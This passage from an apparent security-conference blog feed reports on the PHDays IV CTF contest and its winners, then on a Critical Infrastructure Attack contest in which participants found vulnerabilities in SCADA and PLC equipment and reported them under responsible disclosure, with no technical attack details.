So the plotlines of PHDays III CTF and PHDays IV CTF are related.<br /><br />The text of the <a href="http://www.phdays.com/ctf/index.php?id=2" target="_blank">legend</a> is available on the forum's website.<br /><a name='more'></a><br /><b>The game principle</b><br /><br />There are usually two types of CTF contests. First, task-based contests, where the goal is to solve tasks. Second, attack & defense contests, during which teams need to protect their own systems and attack other teams'. Positive Hack Days CTF combines these concepts and adds original game mechanics. For instance, in addition to standard tasks and services that contain vulnerabilities, PHDays CTF organizers developed unique quests with a limited lifetime, whose bonus depends on how many teams solved them.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-hAE-L4FyzGk/U6KiNnc9PdI/AAAAAAAAEC8/NKJFuPq_ZA8/s1600/ctf2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-hAE-L4FyzGk/U6KiNnc9PdI/AAAAAAAAEC8/NKJFuPq_ZA8/s1600/ctf2.png" height="360" width="640" /></a></div><br />Moreover, the organizers provide an opportunity to earn additional points by taking part in the contests of the main program. In 2012, teams <a href="http://blog.phdays.com/2012/05/ctf-challenges-continue.html" target="_blank">tried to get</a> flags by dumpster diving. During <a href="http://blog.phdays.com/2013/06/hdays-iii-ctf-levart-derrorim.html" target="_blank">PHDays III</a>, participants received additional points if they managed to pass through a special labyrinth.<br /><br />This time, participants could try their hand at discovering vulnerabilities in industrial systems and protocols during the <a href="http://www.phdays.com/program/contests/#17036" target="_blank">Critical Infrastructure Attack</a> contest. 
RDot, one of the teams, gained additional points during this contest.<br /><br />The main task of the second day was the security assessment of a real QIWI terminal set up at the venue. Before the contest began, CTF teams were provided with copies of the software installed on the terminal. Then they had full physical access to the terminal (including the connection of other devices). Participants needed to transfer money (313,370 rubles) to a special digital wallet. More Smoked Leet Chicken came closest to winning.<br /><br /><b>Visualization</b><br /><br />To make the competition more entertaining, the organizers developed a special fantasy-style visualization system last year. This year the organizers updated the system. The special application for <a href="https://itunes.apple.com/ru/app/phdays-iv-ctf-visualizer/id875911386?mt=8" target="_blank">iOS</a> and <a href="https://play.google.com/store/apps/details?id=com.ptsecurity.phd4ctfvis" target="_blank">Android</a> allowed anyone to watch the game on his or her phone display (the application is still available).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-I5-CWK_vfyg/U6KjUH6dapI/AAAAAAAAEDM/2p3ppW7US9A/s1600/ctf3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-I5-CWK_vfyg/U6KjUH6dapI/AAAAAAAAEDM/2p3ppW7US9A/s1600/ctf3.png" height="402" width="640" /></a></div><br />Forum visitors could watch the game on big screens.<br /><br /><b>Winners</b><br /><br />The contest was really fierce. During the two days of the forum, different teams held the lead at various times. Several teams were in the top three during the contest: int3pids, More Smoked Leet Chicken, Dragon Sector, SecurityFirst, Reallynonamesfor, BalalaikaCr3w and Ufologists.<br /><br />The Polish team Dragon Sector became the winner. 
int3pids from Spain took second place, and the Russian team Balalaika Cr3w came third.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-NrX39xZzmtI/U6KjbI1OnKI/AAAAAAAAEDU/yeUJj_cP6IU/s1600/ctf4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-NrX39xZzmtI/U6KjbI1OnKI/AAAAAAAAEDU/yeUJj_cP6IU/s1600/ctf4.png" height="426" width="640" /></a></div><br />Teams from all over the world — from the USA to Japan — participate in PHDays CTF every year. More than 600 teams from all over the world have registered to take part in this year’s PHDays CTF.<br /><br />This year PHDays CTF took place for the fourth time. The contest was launched during the Positive Hack Days forum in 2011. Back then, the team PPP from the US was the winner. The following year in 2012 Leet More from Russia took first place. In 2013 at PHDays III, Eindbazen from the Netherlands took the top prize. Now we can say that a tradition has been established: every year a new team from a new country wins the contest.<br /><div><br /></div></div>Unknownnoreply@blogger.com183tag:blogger.com,1999:blog-5176771794789502609.post-8104252477667536322014-06-16T15:40:00.000+04:002014-06-16T15:40:25.711+04:00Smart City Hacked at PHDays IV<div dir="ltr" style="text-align: left;" trbidi="on">The Critical Infrastructure Attack (CIA) contest at Positive Hack Days IV has shown for the second time how weak critical infrastructure systems can be in terms of security. 
The participants successfully compromised various ICS systems during this two-day contest.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-KmZaDlooh2M/U57Tn1v9OyI/AAAAAAAAEBM/HMkLrd8xFK4/s1600/CIA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-KmZaDlooh2M/U57Tn1v9OyI/AAAAAAAAEBM/HMkLrd8xFK4/s1600/CIA.png" height="496" width="640" /></a></div><br />Last year at PHDays III, the contest was held under a different name, Choo Choo Pwn. Organizers designed a transportation system controlled by real ICS hardware and software.<br /><a name='more'></a><br />The contest's infrastructure was massively updated. Organizers added new SCADA systems (such as <a href="http://www.siemens.com/entry/cc/en/" target="_blank">Siemens</a> <a href="http://www.industry.siemens.com/topics/global/en/tia-portal/hmi-sw-tia-portal/Pages/Default.aspx" target="_blank">TIA Portal 13 Pro</a> and <a href="http://www.schneider-electric.com/products/ww/en/6000-telemetry-remote-scada-systems/6030-remote-scada-software/61264-struxureware-scada-expert-clearscada/" target="_blank">Schneider Electric ClearSCADA 2014</a>) and various OPC servers (<a href="http://www.kepware.com/" target="_blank">Kepware</a> <a href="http://www.kepware.com/Products/kepserverex_features.asp" target="_blank">KepServerEX</a>, <a href="http://honeywell.com/Pages/Home.aspx" target="_blank">Honeywell</a> <a href="http://www.matrikonopc.com/" target="_blank">Matrikon OPC</a>). 
New HMI devices (the <a href="http://www.automation.siemens.com/mcms/human-machine-interface/en/operator-interfaces/basic-panel/devices-first-generation/Pages/Default.aspx" target="_blank">Siemens KTP 600</a> operator panel), PLCs (<a href="http://www.automation.siemens.com/mcms/programmable-logic-controller/en/simatic-s7-controller/s7-300/pages/default.aspx" target="_blank">Siemens Simatic S7-300</a> and <a href="http://www.automation.siemens.com/mcms/programmable-logic-controller/en/simatic-s7-controller/s7-1500/pages/default.aspx" target="_blank">S7-1500</a>) and remote control devices (<a href="http://www.icpdas-usa.com/pet-7000s.php" target="_blank">ICP DAS PET-7067</a>) were presented as well. The <a href="http://www.schneider-electric.com/products/ww/en/5400-substation-automation-systems/5420-controllers/60784-micom-c264/" target="_blank">Schneider Electric MiCOM C264</a> was provided by <a href="http://www.croc.ru/eng/about/index.php" target="_blank">CROC</a>.<br /><br />The contest's stand was created by Ilya Karpov, ICS security expert at Positive Technologies, and his colleagues from the group of SCADA security researchers.<br /><br />Contestants needed to discover and exploit vulnerabilities in SCADA systems and industrial protocols in order to gain control over a robotic arm, cranes, heating plants, and transport management and illumination systems. 
Moreover, certain elements could be controlled remotely: robots, plant facilities, a railroad crossing, and cooling towers.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-D0OsO-5nMHo/U57WCZ9ZNAI/AAAAAAAAEBY/7mN8y8iW2aE/s1600/ci2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-D0OsO-5nMHo/U57WCZ9ZNAI/AAAAAAAAEBY/7mN8y8iW2aE/s1600/ci2.png" height="200" width="640" /></a></div><br />Similar SCADA systems and controllers are commonly used at critical facilities in various industries: factories and hydroelectric plants, transport infrastructure, oil and gas.<br /><br /><a href="http://alisa.sh/" target="_blank">Alisa Shevchenko</a> became the winner of the two-day competition: she detected several zero-day vulnerabilities in <a href="http://www.indusoft.com/" target="_blank">Indusoft Web Studio 7.1</a> by Schneider Electric. Nikita Maksimov shared second place with Pavel Markov. They managed to disrupt the <a href="http://www.icpdas-usa.com/pet-7000s.php" target="_blank">RTU PET-7000</a>, provided by ICP DAS, and guess the password of the web interface of the <a href="http://ab.rockwellautomation.com/Programmable-Controllers/MicroLogix-1400" target="_blank">Allen-Bradley MicroLogix 1400</a> controller by Rockwell Automation. Dmitry Kazakov took third place. He discovered XSS vulnerabilities (published) in the web interfaces of the <a href="http://www.automation.siemens.com/mcms/programmable-logic-controller/en/simatic-s7-controller/s7-1200/pages/default.aspx" target="_blank">Simatic S7-1200</a> controllers by Siemens.<br /><br />"Contestants managed to gain control over robots and cranes via Modbus TCP. During the two days, they detected many critical vulnerabilities, most of them being in Simatic S7-1200 controllers. 
What's more, during the second day, one of the participants caused several operation failures of MiniWeb’s web server <a href="http://www.automation.siemens.com/mcms/human-machine-interface/en/visualization-software/wincc-flexible/Pages/Default.aspx" target="_blank">WinCC Flexible 2008 SP3 Update4</a>," said Ilya Karpov.<br /><br />If exploited in real life, the discovered vulnerabilities could have harmful consequences, such as denial of service and functional failure of critical infrastructure management systems, which in turn may disrupt the normal life of an entire city.<br /><br />In accordance with the responsible disclosure policy, contestants notify the respective vendors about the vulnerabilities they detected. Details about the vulnerabilities will be available after the vendors address them.<br /><br />As the winner, Alisa Shevchenko received a special prize: the <a href="http://www.dji.com/product/phantom-2-vision-plus" target="_blank">Phantom 2 Vision+</a> quadrocopter.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-bI8r6F_YUNA/U57XBJ0_w_I/AAAAAAAAEBk/xi-u1JG7AuU/s1600/cia3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-bI8r6F_YUNA/U57XBJ0_w_I/AAAAAAAAEBk/xi-u1JG7AuU/s1600/cia3.png" height="320" width="320" /></a></div><br /><div style="text-align: center;"><i>Pictured: Alisa Shevchenko</i></div><br />The winners of last year's Choo Choo Pwn <a href="http://blog.phdays.com/2013/05/students-found-scada-vulnerabilities-at.html" target="_blank">were</a> Mikhail Elizarov, a student from the North Caucasian Federal University (Stavropol Krai, Russia), and Arseny Levshin, a university student from Minsk.<br /><br />The contest on critical infrastructure security is one of the main attractions of PHDays. 
Positive Technologies experts also presented the contest’s stand and workshops at Power of Community and at the 30th Chaos Communication Congress in Hamburg.<br /><div><br /></div></div>Unknownnoreply@blogger.com944